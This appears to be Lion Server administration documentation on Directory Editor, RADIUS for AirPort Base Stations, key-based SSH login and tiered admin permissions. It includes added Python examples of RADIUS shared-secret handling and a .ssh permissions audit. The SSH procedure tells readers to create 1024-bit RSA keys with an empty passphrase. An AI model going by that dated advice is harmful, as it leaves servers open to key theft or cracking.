WARNING: Deleting record attributes can cause the server to behave erratically or stop working. Don't delete record attributes unless you know they're not needed for proper server functioning.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Directory Editor.
7. From the Viewing pop-up menu, choose the record type to edit.
8. From the in-node pop-up menu, choose the directory domain or local directory to edit, and authenticate as an administrator of the domain or local directory. To authenticate, click the Lock button next to the directory that you chose.
9. From the records list, select the record to edit. You can also search the record type you've selected by using the search field above the record list.
10. Add an attribute to a record:
a. Click the Add button (+) below the list of attributes, choose an attribute from the "New attribute of type" pop-up menu, and click OK.
b. Enter a value for the new attribute. If you choose Native from the "New attribute of type" pop-up menu, enter the name of a native record in the box that appears below the pop-up menu, then click OK.
11. To delete a record attribute, select the record attribute to delete, then click the Delete button (-) below the list of attributes.
12. Click Save.

Lion Server user management

Directory Utility

Records and attributes

View or edit directory data


You can view or edit raw directory data by using the Directory Editor.

WARNING: Changing raw data in a directory can have unexpected and undesirable consequences. You could inadvertently incapacitate users or computers, or you could unintentionally authorize users to access more resources.

1. Open System Preferences on your computer and click Users & Groups.
2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
3. Click Login Options, then click Edit.
4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator.
6. Click Directory Editor.
7. From the Viewing pop-up menu, choose the record type to view or edit.
8. From the in-node pop-up menu, choose the directory domain or local directory to view or edit, and authenticate as an administrator of the domain or local directory. To authenticate, click the Lock button next to the directory you chose.
9. From the records list, select the record to view or edit. You can also search the record type you chose by using the search field above the record list.
10. From the attributes list (next to the records list), select the attribute name to view or edit. The value of the selected attribute appears in the value pane (below the attribute list), where you can modify it. Depending on the attribute you select, you can change how the value appears in the value pane by clicking Image, Text, or Data. Some attribute values are grayed out and cannot be modified.
11. To save your changes to the record, click Save.

Lion Server user management

Security

RADIUS

About RADIUS

Wireless networking gives companies greater network flexibility, seamlessly connecting laptop users to the network and giving them the freedom to move within the company while staying connected. You use RADIUS to authorize Open Directory users and groups so they can access AirPort Base Stations on a network. By configuring RADIUS and Open Directory you can control who has access to your wireless network.

RADIUS works with Open Directory and Password Server to grant authorized users access to the network through an AirPort Base Station. When a user attempts to access an AirPort Base Station, AirPort communicates with the RADIUS server using Extensible Authentication Protocol (EAP) to authenticate and authorize the user. Users are given access to the network if their credentials are valid and they are authorized to use the AirPort Base Station. If a user is not authorized, he or she cannot access the network through the AirPort Base Station.

Lion Server user management

Security

RADIUS

Set Up RADIUS

RADIUS setup overview


The following steps outline the tasks to configure and set up RADIUS service.

Turn RADIUS on
Before you can configure the service, turn RADIUS on. See Enable RADIUS.

Add AirPort Base Stations to a RADIUS server
Decide which AirPort Base Stations to add to the RADIUS server. See Add AirPort Base Stations to a RADIUS server.

Remotely configure an AirPort Base Station
Use Server Admin to configure AirPort Base Stations. See Remotely configure AirPort Base Stations.

Configure RADIUS to use certificates
Use Server Admin to configure RADIUS to use certificates to trust Base Stations. See Configure RADIUS to use certificates.

Start RADIUS
To start RADIUS, see Start or stop RADIUS.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Enable RADIUS

Before you can configure RADIUS settings, turn on RADIUS service in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings, then click Services.
3. Select the RADIUS checkbox.
4. Click Save.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Use the configuration assistant to configure RADIUS


You can use the RADIUS configuration assistant to configure RADIUS. The configuration assistant guides you through the RADIUS configuration process and lets you start RADIUS.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Overview.
5. Click Configure RADIUS Service.
6. In the RADIUS Server Certificate pane, select one of the following:
If you select "Choose an existing certificate", choose the certificate from the pop-up menu and click Continue.
If you want to create a self-signed certificate, use Certificate Assistant. For more information, see Server Admin Help.
7. From the Available Base Stations list, select the Base Station you want and click Add.
8. Enter the password of the Base Station in the Base Station Password field, then click Add. To remove a Base Station from the Selected Base Stations list, select it and click Remove.
9. Click Continue.
10. In the RADIUS Allow Users pane, you can restrict user access:
If you select "Allow all users", all users have access to the Base Stations you selected.
If you select "Restrict to members of group", only members of that group can access the Base Stations you selected.
11. Click Continue.
12. In the RADIUS setting confirmation pane, verify your settings. You can also print or save your RADIUS configuration settings.
13. Click Confirm.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Use radiusconfig to configure RADIUS


You can use radiusconfig to configure RADIUS.

To view RADIUS settings:

$ sudo radiusconfig -appleversion -getconfig -getconfigxml -nascount -naslist -naslistxml -ver

To configure RADIUS parameters:

$ sudo radiusconfig -setconfig key value [key value ...]

Parameter  Description
key        The name of the key to configure in the radiusd.conf or eap.conf files.
value      The value of the key.

For information about RADIUS server settings, see RADIUS command-line settings. For information about radiusconfig, see its man page.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Add AirPort Base Stations to a RADIUS server


You use the Base Stations pane of RADIUS in Server Admin to add AirPort Base Stations that will use RADIUS service. You can add up to 64 Base Stations to RADIUS.

1. On the management computer, open Server Admin.
2. Click the triangle at the left of the server. The list of services appears.
3. In the expanded Servers list, click RADIUS.
4. Click Base Stations.
5. Below the AirPort Base Stations list, click the Add button (+).
6. Enter the following AirPort Base Station information:
Name: Specify the name of the AirPort Base Station.
Type: Specify the model of the AirPort Base Station.
IP Address: Specify the IP address of the AirPort Base Station.
Shared Secret and Verify: Specify a shared secret. The shared secret is not a password for authentication, nor does it generate encryption keys to establish secure tunnels between nodes. It is a token that key management systems use to trust each other. You must enter the shared secret on the server as well as on the client.
7. Click Add.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Add Bonjour-enabled AirPort Base Stations to a RADIUS server


If your network has AirPort Base Stations that announce themselves using Bonjour, use the Base Stations pane of RADIUS in Server Admin to add them to your RADIUS server. You can add up to 64 Base Stations to RADIUS.

1. On the management computer, open Server Admin.
2. Click the triangle at the left of the server. The list of services appears.
3. In the expanded Servers list, click RADIUS.
4. Click Base Stations.
5. Below the AirPort Base Stations list, click Browse. A list of AirPort Base Stations found through Bonjour appears. It shows all AirPort Base Stations on the server's local subnet and in all Wide-Area Bonjour domains known to the server. This includes search domains listed in Network Preferences that have AirPort Base Stations, and AirPort Base Stations you added to a MobileMe account as a Back to My Mac (BTMM) enabled server.
6. From the list of AirPort Base Stations, choose an AirPort Base Station to add to your RADIUS server.
7. In the Base station password field, enter the password for the AirPort Base Station.
8. Click Add. When the base station is added, it is configured to use WPA2 Enterprise for client authentication through TTLS. A random shared secret is also set for communication between the Base Station and RADIUS on the server. The shared secret is not a password for authentication, nor does it generate encryption keys to establish secure tunnels between nodes. It is a token that key management systems use to trust each other.
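The two topics above (adding Base Stations by hand and by Bonjour) both end with a shared secret that the server and each Base Station must hold in common. The following Python program is an added example, not code from Apple or from Lion Server, showing what that secret does on the wire according to RFC 2865: the Base Station (the RADIUS client, or NAS) hides the User-Password attribute with MD5 keyed by the secret and a fresh Request Authenticator, and the server's reply carries a Response Authenticator that the client can only verify if both sides used the same secret. The NAS table, IP address, user record and secret value are all constructed for the example; the server-side lookup of the NAS by source IP mirrors the Base Stations pane, and a request from an unknown NAS is discarded without a reply.

```python
"""RFC 2865 shared-secret mechanics: User-Password hiding in an Access-Request,
Response Authenticator checking, and a NAS (base station) table keyed by IP."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2

# Constructed NAS table, the equivalent of Base Stations pane entries:
# source IP -> (name, shared secret). Placeholder values, not real devices.
NAS_TABLE = {"10.0.0.5": ("Example AirPort Extreme", b"constructed-shared-secret")}
# Constructed user database standing in for Open Directory / Password Server.
USERS = {"alice": "correct horse battery staple"}


def _attr(attr_type, value):
    # Attribute = Type(1) | Length(1, counts both header bytes) | Value
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def hide_password(secret, request_auth, password):
    """RFC 2865 5.2: XOR each 16-byte chunk with MD5(secret + previous chunk)."""
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        pad = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ k for p, k in zip(padded[i:i + 16], pad))
        out += prev
    return out


def reveal_password(secret, request_auth, hidden):
    """Inverse of hide_password; a wrong secret yields garbage, not an error."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        pad = hashlib.md5(secret + prev).digest()
        chunk = hidden[i:i + 16]
        out += bytes(c ^ k for c, k in zip(chunk, pad))
        prev = chunk
    return out.rstrip(b"\x00")


def _packet(code, identifier, authenticator, attributes):
    return struct.pack("!BBH", code, identifier, 20 + len(attributes)) + authenticator + attributes


def build_access_request(secret, identifier, username, password, request_auth=None):
    """NAS side. The Request Authenticator is 16 fresh random bytes."""
    request_auth = request_auth or os.urandom(16)
    attrs = _attr(ATTR_USER_NAME, username.encode())
    attrs += _attr(ATTR_USER_PASSWORD, hide_password(secret, request_auth, password.encode()))
    return _packet(ACCESS_REQUEST, identifier, request_auth, attrs)


def parse_attributes(payload):
    attrs, pos = {}, 0
    while pos + 2 <= len(payload):
        attr_type, length = payload[pos], payload[pos + 1]
        if length < 2 or pos + length > len(payload):
            raise ValueError("malformed attribute")
        attrs[attr_type] = payload[pos + 2:pos + length]
        pos += length
    return attrs


def response_authenticator(secret, code, identifier, request_auth, attributes):
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, identifier, 20 + len(attributes))
    return hashlib.md5(header + request_auth + attributes + secret).digest()


def build_response(secret, request, code, attributes=b""):
    identifier, request_auth = request[1], request[4:20]
    auth = response_authenticator(secret, code, identifier, request_auth, attributes)
    return _packet(code, identifier, auth, attributes)


def verify_response(secret, request, response):
    """NAS side: accept a reply only if it matches our request and our secret."""
    if len(response) < 20:
        return False
    code, identifier, length = struct.unpack("!BBH", response[:4])
    if length != len(response) or identifier != request[1]:
        return False
    expected = response_authenticator(secret, code, identifier, request[4:20], response[20:])
    return hmac.compare_digest(expected, response[4:20])


def handle_request(nas_ip, request):
    """Server side: unknown NAS -> silently discard (None); otherwise Accept or Reject."""
    entry = NAS_TABLE.get(nas_ip)
    if entry is None:
        return None
    secret = entry[1]
    attrs = parse_attributes(request[20:])
    username = attrs.get(ATTR_USER_NAME, b"").decode(errors="replace")
    password = reveal_password(secret, request[4:20], attrs.get(ATTR_USER_PASSWORD, b""))
    ok = username in USERS and hmac.compare_digest(password, USERS[username].encode())
    return build_response(secret, request, ACCESS_ACCEPT if ok else ACCESS_REJECT)


if __name__ == "__main__":
    secret = NAS_TABLE["10.0.0.5"][1]
    req = build_access_request(secret, 7, "alice", USERS["alice"])
    resp = handle_request("10.0.0.5", req)
    print("accepted:", resp[0] == ACCESS_ACCEPT, "verified:", verify_response(secret, req, resp))
```

Two things worth noticing when running it: a Base Station configured with the wrong secret does not produce an error on the server, only a password that decodes to garbage and an Access-Reject, which is why a mismatched secret looks like a user credential problem in the radiusd log; and the whole construction rests on MD5 keyed with the secret, so the secret's length and randomness are what stand between an observer on the wired path and the user's password.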

Lion Server user management

Security

RADIUS

Set Up RADIUS

Remotely configure AirPort Base Stations


You can remotely configure AirPort Base Stations to use a RADIUS server in Server Admin.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Stations list, highlight the AirPort Base Station and then click Edit. If prompted, enter the AirPort administrator password.
6. Click OK.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Configure RADIUS to use certificates


You can use Server Admin to configure RADIUS to use custom certificates. Using a certificate increases the security and manageability of AirPort Base Stations.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Settings.
5. From the RADIUS Certificate pop-up menu, choose a certificate. If you don't have a certificate and want to create one, click Manage Certificates. For more information about creating certificates, see Server Admin Help.
6. Click Save.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Use radiusconfig to configure RADIUS certificates


You can use radiusconfig to import certificates for RADIUS.

To configure RADIUS certificates:

$ sudo radiusconfig -installcerts private-key certificate [trusted-ca-list [yes | no [common-name]]]

Parameter        Description
private-key      The file path to the client's private key to use in the certificate
certificate      The file path to the certificate
trusted-ca-list  The file path to the trusted CA list
yes              A request to check a certificate revocation list
no               A request to not check a certificate revocation list
common-name      The common name

This command changes eap.conf to contain an active TLS section and configures the certificates. This command also replaces the random file and creates the dh file if absent. For information about radiusconfig, see its man page.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Archive RADIUS service logs


RADIUS service creates entries in the system log for error and alert messages. You can archive these log entries.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Settings.
5. Select the "Archive radiusd log for the past __ days" checkbox and enter the number of days to archive.
6. Click Save.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Use radiusconfig to archive service logs


You can use radiusconfig to archive RADIUS service logs.

To rotate RADIUS service logs:

$ sudo radiusconfig -rotatelog [-n file-count] base-file

To configure the automatic rotation of RADIUS service logs:

$ sudo radiusconfig -autorotatelog [on | off] [-n file-count]

Parameter   Description
file-count  Specifies the number of log files to preserve.
base-file   Specifies the name of the log file.
on          Enables automatic log rotation.
off         Disables automatic log rotation.

For information about radiusconfig, see its man page.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Start or stop RADIUS


You use Server Admin to start or stop RADIUS. When you stop RADIUS, make sure no users are connected to AirPort Base Stations your RADIUS server manages.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Below the Servers list, click Start RADIUS or Stop RADIUS. The service can take a few seconds to start or stop.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Use radiusconfig to start or stop RADIUS


You can use radiusconfig to start or stop RADIUS.

To start the RADIUS server:

$ sudo radiusconfig -start

To stop the RADIUS server:

$ sudo radiusconfig -stop

For information about radiusconfig, see its man page.

Lion Server user management

Security

RADIUS

Set Up RADIUS

RADIUS command-line settings


To change settings for RADIUS, use the following parameters with the radiusconfig tool.

Command option  Description
-appleversion   Displays the version of the tool, including the build version.
-getconfig      Displays configuration data stored in the radiusd.conf and eap.conf files in an abbreviated, user-friendly format.
-getconfigxml   Displays configuration data stored in the radiusd.conf and eap.conf files in XML plist format.
-nascount       Displays the number of RADIUS clients.
-naslist        Displays the list of RADIUS clients formatted for the clients.conf file.
-naslistxml     Displays the list of RADIUS clients in XML plist format.
-ver            Displays a specific build version.
-help           Displays usage information.
-q              Suppresses prompts.

Lion Server user management

Security

RADIUS

Set Up RADIUS

Enable or disable Transport Layer Security (TLS)


You can enable or disable Transport Layer Security (TLS) by modifying the TLS section of the eap.conf file.

To enable TLS:

$ sudo radiusconfig -enable-tls

To disable TLS:

$ sudo radiusconfig -disable-tls

Lion Server user management

Security

RADIUS

Manage RADIUS

Check RADIUS status


You can use Server Admin to check the status of RADIUS.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Overview to see whether the service is running, the number of client base stations, and when it was started.

Lion Server user management

Security

RADIUS

Manage RADIUS

View RADIUS logs


RADIUS creates entries in the system log for error and alert messages. You can filter the log to narrow the number of viewable log entries and make it easier to find an entry.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Logs.
5. Choose a log to view (radiusconfig or radiusd).

Lion Server user management

Security

RADIUS

Manage RADIUS

Edit RADIUS access


You can restrict access to RADIUS by creating a group of users and adding them to the service access control list (SACL) of RADIUS.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Settings, then click Edit Allowed Users.
5. Select "For selected services below", then select RADIUS.
6. Click Services.
7. Select "Allow only users and groups below".
8. Click the Add button (+).
9. From the Users & Groups window, drag users or groups to the "Allow only users and groups below" list. If you don't see a recently created user, click the Refresh button (below the Servers list). To remove users from the "Allow only users and groups below" list, select the users or groups and click the Delete button (-). Only users in the list can use RADIUS service.

Lion Server user management

Security

RADIUS

Manage RADIUS

Delete AirPort Base Stations


You can use Server Admin to delete AirPort Base Stations from the RADIUS server. When you delete AirPort Base Stations, make sure the stations are disconnected from the network. Otherwise, unauthorized users might access your network.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Station list, highlight a Base Station and click Remove.
6. Verify that you want to remove the Base Station by clicking Remove again.

Lion Server user management

Security

RADIUS

Manage RADIUS

Edit an AirPort Base Station record


You can use Server Admin to edit an AirPort Base Station record on your RADIUS server.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Station list, highlight the Base Station to modify and click the Edit button.
6. Modify the Base Station information and click Save.

Lion Server user management

Security

RADIUS

Manage RADIUS

Save an AirPort Base Station Internet Connect file


You can use Server Admin to save an AirPort Base Station Internet Connect file.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Station list, highlight the base station.
6. Click Save Internet Connect File.
7. In the Save As field, enter the name.
8. From the Where pop-up menu, choose the location to save the file.
9. In the Wireless Network Name (SSID) field, enter the wireless network name.
10. Click Save.

Lion Server user management

Security

RADIUS

Manage RADIUS

Use radiusconfig to manage RADIUS clients


Use the radiusconfig tool to add, import, remove, and configure RADIUS clients.

To add RADIUS clients:

$ sudo radiusconfig -addclient nas-name shortname [type]

To import RADIUS clients:

$ sudo radiusconfig -importclients xml-plist-file

To remove RADIUS clients:

$ sudo radiusconfig -removeclient nas-name [nas-name ...]

To assign an access control group to a client of the RADIUS service:

$ sudo radiusconfig -setgroup nas-name group-name

Parameter       Description
nas-name        The name of the client
shortname       The shortname of the client
type            (Optional) The type of the client
xml-plist-file  The name of the file, including the path, to import clients from
group-name      The name of the access control group

For information about radiusconfig, see its man page.

Lion Server user management

Security

SSH key authentication

Key-Based SSH login


SSH is a network protocol that establishes a secure channel between your computer and a remote computer. It uses public-key cryptography to authenticate the remote computer. It also provides encryption and integrity protection for the traffic exchanged between computers. Key-based authentication is helpful for such tasks as automating file transfers and backups and for creating failover scripts, because it allows computers to communicate without a user needing to enter a password.

Important: Key-based authentication has risks. If the private key you generate becomes compromised, unauthorized users can access your computers. You must determine whether the advantages of key-based authentication are worth the risks.

SSH is frequently used to log in to a remote machine to execute commands, but you can also use it to create a secure data tunnel, forwarding through an arbitrary TCP port. You can also use SSH to transfer files using SFTP and SCP. By default, an SSH server uses the standard TCP port 22.

Lion Server uses OpenSSH as the basis for its SSH tools. Notably, portable home directory synchronization and Open Directory replication are provided via SSH.

Lion Server user management

Security

SSH key authentication

Generate a key pair for SSH authentication


This is the process of setting up key-based SSH login authentication on Lion Server. To set up key-based SSH, you must generate the keys the two computers will use to establish and validate each other's identity. This doesn't authorize all users of the computer to have SSH access. Keys must be generated for each user account. To do this, you must run the following commands in Terminal. The process must be repeated for each user that needs to open key-based SSH sessions.

Important: Key-based authentication has risks. If the private key you generate becomes compromised, unauthorized users can access your computers. You must determine whether the advantages of key-based authentication are worth the risks.

1. Verify that an .ssh folder exists in your home folder by entering the command:
ls -ld ~/.ssh
If .ssh is listed in the output, move to step 2. If .ssh is not listed in the output, run mkdir -m 700 ~/.ssh and continue to step 2.
2. Change directories in the shell to the hidden .ssh directory by entering the following command:
cd ~/.ssh
3. Generate the public and private keys by entering the following command:
ssh-keygen -b 1024 -t rsa -f id_rsa -P ''
The -b flag sets the length of the keys to 1,024 bits, -t selects the RSA algorithm, -f sets the file name as id_rsa, and -P followed by two single-quote marks sets the private key password to be null. The null private key password allows for automated SSH connections. Keys are equivalent to passwords, so keep them private and protected.
4. Copy the public key into the authorized key file by entering the following command:
cat id_rsa.pub >> authorized_keys2
5. Set the permissions on the private key so the file can only be read and changed by the owner:
chmod go-rwx ~/.ssh/id_rsa
6. Copy the public key and the authorized key list to the specified user's home folder on the remote computer by entering the following command:
scp authorized_keys2 username@remotemachine:~/.ssh/
To establish two-way communication between servers, repeat this process on the second computer.
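The procedure above leaves a passphrase-less RSA key whose only protection is file permissions, so the checks worth automating are exactly those: the mode of ~/.ssh and of the private key, whether authorized_keys files are writable by others, whether the private key is stored unencrypted, and how large the key actually is. The following Python script is an added example (not Apple's code and not part of Lion Server) that audits a .ssh folder for these points. It reads the RSA modulus size out of the public key file's OpenSSH encoding and flags anything below 2048 bits, a floor assumed for this example that is stricter than the 1,024 bits used in step 3. The folder it audits is constructed by the script itself in a temporary directory, with a placeholder private-key file and a synthetic public key (a modulus of the right size, not a real key pair), and it deliberately repeats one common mistake: the private key left readable by everyone.

```python
"""Audit a .ssh directory for the properties the key-based login procedure
relies on: directory and private-key modes, passphrase-less private keys,
world-writable authorized_keys files, and RSA modulus size from the .pub file."""
import base64
import os
import stat
import struct
import tempfile

MIN_RSA_BITS = 2048  # assumed floor for this audit; the procedure above uses 1024


def _ssh_string(data):
    # OpenSSH wire format: 4-byte big-endian length followed by the bytes.
    return struct.pack("!I", len(data)) + data


def make_rsa_pubkey_line(bits, comment):
    """Constructed ssh-rsa public key line whose modulus has exactly `bits` bits.
    The modulus is NOT a real RSA modulus; only its encoding and size matter here."""
    modulus = (1 << (bits - 1)) | 1
    n_bytes = modulus.to_bytes(bits // 8 + 1, "big")  # leading 0x00 keeps the mpint positive
    blob = _ssh_string(b"ssh-rsa") + _ssh_string(b"\x01\x00\x01") + _ssh_string(n_bytes)
    return "ssh-rsa %s %s\n" % (base64.b64encode(blob).decode(), comment)


def parse_pubkey_line(line):
    """Decode the base64 blob of an OpenSSH public key line; report type and size."""
    key_type, b64 = line.split()[:2]
    blob, pos, fields = base64.b64decode(b64), 0, []
    while pos < len(blob):
        (length,) = struct.unpack("!I", blob[pos:pos + 4])
        fields.append(blob[pos + 4:pos + 4 + length])
        pos += 4 + length
    if not fields or fields[0].decode() != key_type:
        raise ValueError("key type inside the blob does not match the line prefix")
    if key_type == "ssh-rsa":
        e, n = int.from_bytes(fields[1], "big"), int.from_bytes(fields[2], "big")
        return {"type": key_type, "bits": n.bit_length(), "exponent": e}
    return {"type": key_type, "bits": None, "exponent": None}


def audit_ssh_dir(ssh_dir):
    """Return a list of findings; an empty list means nothing to report."""
    findings = []
    if stat.S_IMODE(os.stat(ssh_dir).st_mode) & 0o077:
        findings.append("%s: accessible by group/other (expected mode 0700)" % ssh_dir)
    for name in sorted(os.listdir(ssh_dir)):
        path = os.path.join(ssh_dir, name)
        mode = stat.S_IMODE(os.stat(path).st_mode)
        with open(path, "rb") as fh:
            data = fh.read()
        if name.endswith(".pub"):
            info = parse_pubkey_line(data.decode())
            if info["type"] == "ssh-rsa" and info["bits"] < MIN_RSA_BITS:
                findings.append("%s: RSA modulus is %d bits (below %d)"
                                % (name, info["bits"], MIN_RSA_BITS))
        elif name.startswith("authorized_keys"):
            if mode & 0o022:
                findings.append("%s: writable by group/other" % name)
        elif b"PRIVATE KEY" in data:
            if mode & 0o077:
                findings.append("%s: private key readable by group/other" % name)
            if b"ENCRYPTED" not in data:
                findings.append("%s: private key has no passphrase (automation key; keep it protected)" % name)
    return findings


def build_sample_dir(base):
    """Construct a .ssh folder like the one the procedure produces, with one mistake:
    the private key is left readable by everyone (mode 0644)."""
    ssh_dir = os.path.join(base, ".ssh")
    os.mkdir(ssh_dir)
    os.chmod(ssh_dir, 0o700)
    pub = make_rsa_pubkey_line(1024, "admin@exampleserver1.example.com")
    files = {
        "id_rsa": ("-----BEGIN RSA PRIVATE KEY-----\n(constructed placeholder, no passphrase)\n"
                   "-----END RSA PRIVATE KEY-----\n", 0o644),
        "id_rsa.pub": (pub, 0o644),
        "authorized_keys2": (pub, 0o600),
    }
    for name, (content, mode) in files.items():
        path = os.path.join(ssh_dir, name)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return ssh_dir


def run_demo():
    """Build the constructed folder, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_ssh_dir(build_sample_dir(tmp))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Against the constructed folder the audit reports three findings: the private key is readable by group and others (the step 5 chmod was skipped), it has no passphrase (expected for an automation key, but worth recording), and the public key is 1,024 bits. To audit a real account, call audit_ssh_dir(os.path.expanduser("~/.ssh")) instead of run_demo().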

Lion Server user management

Security

SSH key authentication

Key-Based SSH with scripting sample


A cluster of servers is an ideal environment for using key-based SSH. The following Perl script is a trivial scripting example that should not be implemented, but it demonstrates connecting over an SSH tunnel to servers defined in the variable serverList, running softwareupdate, installing available updates, and restarting the computer if necessary. The script assumes that key-based SSH was set up for an admin user on all servers to be updated.

#!/usr/bin/perl
use strict;
use warnings;

# Servers to update. Inside single quotes "@" needs no escaping;
# the "\@" escape is only needed in double-quoted strings.
my @serverList = ('admin@exampleserver1.example.com', 'admin@exampleserver2.example.com');

foreach my $server (@serverList) {
    my $flag = 0;    # set when softwareupdate reports that a restart is needed
    open(my $sbuff, '-|', "ssh $server -x -o BatchMode=yes 'softwareupdate -i -a'")
        or die "cannot run ssh to $server: $!";
    while (my $line = <$sbuff>) {
        chomp $line;
        # check for the restart text in the softwareupdate output
        $flag = 1 if $line =~ /Please restart immediately/;
    }
    close $sbuff;
    if ($flag == 1) {
        system("ssh $server -x -o BatchMode=yes shutdown -r now");
    }
}

Lion Server user management

Security

Administrator permissions

About administration level privileges


Lion Server can use another level of access control for added security. Administrators can be limited to specific services they can configure. These limitations are enacted on a server-by-server basis. An administrator with no restrictions can use this method to assign administrative duties to other admin group users. This results in a tiered administration model, where some administrators have more privileges than others for their assigned services, and amounts to access control for individual server features and services.

You can determine which services other admin group users can modify. To do this, the administrator making the determination must have full, unmodified access.

Lion Server user management

Security

Administrator permissions

Using a non-Mac computer for administration


You can use a non-Mac computer that offers SSH support, such as a UNIX workstation, to administer Lion Server using command-line tools. You can also use any computer that can run a VNC viewer to administer Lion Server. Administering the server via VNC is the same as using the server's keyboard, mouse, and monitor locally. You use all the same utilities that Lion uses, but virtually over VNC. You enable a VNC server on Lion Server by enabling Screen Sharing in the Sharing pane of System Preferences.

Use this command-line tool          To
serveradmin                         Configure and monitor services and administrator access.
ssh                                 Connect to a server using a UNIX command shell.
asr                                 Perform mass disk imaging tasks.
bootpd                              Control DHCP service parameters.
calendarserver_manage_principals    Add locations and resources to your iCal server.
calendarserver_purge_principals     Remove locations and resources from your iCal server.
defaults                            Read and write system or application preferences.
diskutil                            Modify, verify, and repair local disks.
dscacheutil                         Gather information and statistics and initiate queries to the Directory Service cache.
dscl                                Configure and alter Directory Services.
dsconfigad                          Configure and modify Active Directory services.
dseditgroup                         Manipulate group directory records.
freshclam                           Update the mail service anti-virus database.
hdiutil                             Manipulate disk images.
installer                           Install software packages.
kdcsetup                            Configure an Apple Open Directory KDC.
kickstart                           Modify Remote Desktop settings and access.
launchctl                           Control launchd.
networksetup                        Configure network settings in System Preferences.
osascript                           Run AppleScripts from the command line.
pwpolicy                            Get and set password policy.
radiusconfig                        Configure the RADIUS services via radiusd.
sa-learn                            Train SpamAssassin's Bayesian filter.
security                            Manipulate keychains and the Security framework.
slapconfig                          Configure slapd and related daemons.
systemsetup                         Configure certain machine settings in System Preferences.

Many additional standard UNIX tools are available, such as chmod, mkdir, chown, sudo, tar, pax, rsync, cp, scp, ditto, gzip, tail, syslog, exit, su, srm, less, cat, passwd, and shutdown.

Lion Server user management

Security

Administrator permissions

Define tiered administrative permissions


You can decide whether a user or group can monitor or administer a server or service without giving them the full power of a UNIX administrative user. Assigning effective permissions to users creates a tiered administration, where some but not all administrative duties can be carried out by designated individuals.

1. Open Server Admin.
2. Select a server, click the Settings button in the toolbar, and then click the Access tab.
3. Click the Administrators tab.
4. Select whether to define administrative permissions for all services on the server or for selected services.
5. If you define permissions by service, select the related checkbox for each service you want to turn on. If you define permissions by service, be sure to assign administrators to all the active services on the server.
6. Click the Add button (+) to add a user or group from the Users & Groups window. To remove administrative permissions, select a user or group and click the Remove (-) button.
7. For each user or group, select the permission level next to the user or group name. You can choose Monitor or Administer. When the server is added to the Server list, this setting limits what Server Admin can do on the server.

Lion Server user management

Security

Administrator permissions

Add and remove services in the server view


Before you can set up services using Server Admin, you must add the service to the server view. You can add items to Server Admin's service list using the command line. By default, no services are shown for your server. As you select services to administer, configuration panes become accessible in a list underneath your computer name. When you select services from the list, those services appear underneath the server hostname in the server list.

sudo serveradmin settings info:serviceConfig:services:com.apple.ServerAdmin.<service name>:configured = yes

Lion Server user management

Security

Administrator permissions

Tiered administration permissions


You can grant individuals and groups specific administrative permissions without adding them to the UNIX admin group. In other words, you can make them administrator users. There are two tiers of permissions:

Administer: This level of permission is analogous to being in the UNIX admin group. You can change any setting on the server for the designated server and service only.

Monitor: This level of permission allows you to view Overview panes, Log panes, and other information panes in Server Admin, as well as general server status data in server status lists. You do not have access to any saved service settings.

Any user or group can be given these permissions for all services or for selected services. The permissions are stored on a per-server basis. The only users that can change the tiered administration access list are users that are in the UNIX admin group.

